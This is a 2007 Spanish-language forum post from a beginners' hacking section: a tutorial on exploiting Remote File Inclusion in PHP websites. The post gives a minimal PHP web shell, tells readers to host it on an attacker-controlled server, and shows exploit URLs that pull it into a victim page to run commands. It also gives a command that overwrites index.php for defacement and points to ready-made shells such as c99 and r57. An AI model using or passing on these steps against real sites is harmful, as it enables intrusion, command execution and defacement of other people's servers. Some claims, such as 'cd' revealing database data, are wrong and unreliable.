INFORMATICA EN GENERAL INFORMATICA EN GENERAL
 ADRIAN MUÑOZ
RegistrarseBuscarChatMiembrosGrupos de UsuariosLogin
Introduccion a RFI By rUsH

 
Responder al tema    Foros de discusión » HACKING PARA NOVATOS Ver tema anterior
Ver tema siguiente
Introduccion a RFI By rUsH
Autor Mensaje
rUsH

Registrado: 02 May 2007
Mensajes: 2

Mensaje Introduccion a RFI By rUsH Responder citando
Introduccion:

Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.

La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:

http://[servidor_victima]/index.php?.

Para obtener la shell de la web solo necesitamos este codigo:

http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.

Ejemplo:http//ww.rush.com/index.php?

Esa seria una web vulenerable.

Para poder hacer un ataque RFI tendremos que hacer esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)

Para saber si es vulnerable en el block de notas pegas esto

<?

system($cmd)

?>

aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.

Oora procedemos a usar esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)

y listo asi explotaran el comando.

Un ejemplo de una shell explotada:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd

pwd—> nos muestra en que parte del servidor estamos por ejemplo:

Home/host/www

Una Shell para sobreescribir un archivo es:

/shell.txt?&cmd=Defaced By: rUsH >index.php.

Para ejecutar mas de un comando solo usen esto “;”

/shell.txt?&cmd=[coamando];[Comando];[Comando]

Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando

/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos

Para saber los datos de la DB usa este comando:

/shell.txt?&cmd=cd

Es todo.

By:rUsH

BUeno esto en realidad es solo un ejemplar ia que existen varias shell's que no necesitan de Comandos ....
Por ejemplo c99 r57 entre otras si tiene dudas posteenlas
Mie May 02, 2007 10:20 pm Ver perfil de usuario Enviar mensaje privado
Mostrar mensajes de anteriores:    
Responder al tema    Foros de discusión » HACKING PARA NOVATOS Todas las horas son GMT
Página 1 de 1


 
Cambiar a: 
Puede publicar nuevos temas en este foro
No puede responder a temas en este foro
No puede editar sus mensajes en este foro
No puede borrar sus mensajes en este foro
No puede votar en encuestas en este foro


Mapa del sitio - Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Flowers Online.

¿Quieres crear un foro gratis como este? foro gratis